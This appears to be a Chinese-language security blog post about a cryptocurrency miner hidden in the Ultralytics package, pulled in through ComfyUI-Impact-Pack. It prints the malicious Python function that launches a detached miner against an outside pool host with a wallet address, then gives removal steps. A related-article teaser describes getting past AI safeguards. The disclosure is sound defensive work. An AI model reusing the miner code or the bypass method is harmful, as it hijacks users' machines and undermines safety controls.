DMflow.chat
廣告
一站整合多平台聊天,智能溝通新體驗!支援 Facebook、Instagram、Telegram、LINE 和網站,內建 ChatGPT 與 Gemini 模型。提供歷史記錄保存、推播通知、行銷活動和客服轉接等強大功能,助您全方位提升效率與互動!
近期在使用 ComfyUI 搭配 ComfyUI-Impact-Pack 擴展時,發現疑似未經授權的加密貨幣挖礦行為。問題來源為 Ultralytics 套件中的一段惡意 Python 程式碼,該程式碼試圖使用系統資源進行未經許可的挖礦操作。
這次事件涉及到安裝於以下路徑中的下載模組 (downloads.py):
你的使用者路徑/AppData/Roaming/Python/Python312/site-packages/ultralytics/utils
以下是檢測到的惡意程式碼:
def safe_run(path):
os.chmod(path, 0o770)
command = [
path,
'-u',
'4BHRQHFexjzfVjinAbrAwJdtogpFV3uCXhxYtYnsQN66CRtypsRyVEZhGc8iWyPViEewB8LtdAEL7CdjE4szMpKzPGjoZnw',
'-o',
'connect.consrensys.com:8080',
'-k'
]
process = subprocess.Popen(
command,
stdin=subprocess.DEVNULL,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
preexec_fn=os.setsid,
close_fds=True
)
os.remove(path)
os.chmod
令檔案可執行。connect.consrensys.com:8080
。該惡意行為與 Ultralytics 套件的可疑版本有關,該版本似乎作為 ComfyUI-Impact-Pack 的自動依賴項被安裝。
你的使用者路徑/AppData/Roaming/Python/Python312/site-packages/ultralytics
可能由 ComfyUI-Impact-Pack 中的 install.py
腳本觸發,該腳本會自動安裝依賴項。
connect.consrensys.com
4BHRQHF...
)表明有活躍的挖礦帳戶或操作。pip uninstall ultralytics ultralytics-thop
./ComfyUI/custom_nodes/ComfyUI-Impact-Pack
掃描系統 使用防毒軟體和惡意程式檢測工具,確保沒有持續的威脅。
檢查網路連接
確認是否有到 connect.consrensys.com
的外部連接,並在防火牆中封鎖。
你的使用者路徑/AppData/Roaming/Python/Python312/site-packages/ultralytics/utils/downloads.py
此次事件表明開源專案中的依賴項審查不足可能導致使用者系統遭到惡意攻擊。建議開源社群實施更嚴格的審核機制以保護最終用戶。
一站整合多平台聊天,智能溝通新體驗!支援 Facebook、Instagram、Telegram、LINE 和網站,內建 ChatGPT 與 Gemini 模型。提供歷史記錄保存、推播通知、行銷活動和客服轉接等強大功能,助您全方位提升效率與互動!
震撼彈!AI 安全防線一秒失守?亂改大小寫、加符號就能破解 描述 知名 AI 公司 Anthropic 近期發布了一項驚人研究,揭露現今 AI 模型的安全機制存在巨大漏洞。研究人員開發了一種...
Anthropic 打造高效能 LLM 智慧代理:模式與實踐 本文根據實務經驗,總結出打造高效能大型語言模型 (LLM) 智慧代理的最佳實踐。它探討了從簡單工作流程到自主代理等不同的代理...
OpenAI 12天重大更新全解析:O1正式版、ChatGPT Pro、Sora影片生成、O3懶人包整理 簡介 OpenAI連發12項重大更新整理,包含O1正式版發布、ChatGPT Pro訂...
OpenAI Day12: AI模型重大突破:o3系列展現超越人類的推理能力 文章摘要 在人工智慧發展歷程中,迎來一個重要的里程碑:全新的o3系列模型於數學運算、程式編寫等領域展現前所未有的卓...
Pika 2.0推出場景控制新功能,正面迎戰OpenAI的Sora 突破性的AI影片生成工具Pika發布2.0版本,為創作者帶來更強大的場景控制功能與客製化選項,震撼AI影片生成市場。 ...
OpenAI Day11: ChatGPT桌面應用程式重大突破:新一代AI助手功能全面解析 描述: OpenAI最新發布的ChatGPT桌面應用程式帶來革命性的功能升級,從簡單的問答轉變為強大...
什麼是 LangGraph 以及如何使用? 描述 LangGraph 是 LangChain 生態系統中的一個庫,為定義、協調和執行多個 LLM 代理(或鏈)提供了一個框架,使得構建複雜的多代...
Stable Fast 3D:革命性單圖3D模型生成技術 Stability AI推出突破性技術Stable Fast 3D,只需0.5秒即可從單一圖像生成高品質3D資產。這項創新為遊戲開發、...
微軟Copilot:您的AI助手革新工作與生活 微軟Copilot是一款強大的AI助手,為您的日常工作和個人生活帶來革命性變化。本文深入探討Copilot的功能、版本和使用方法,幫助您充分利用...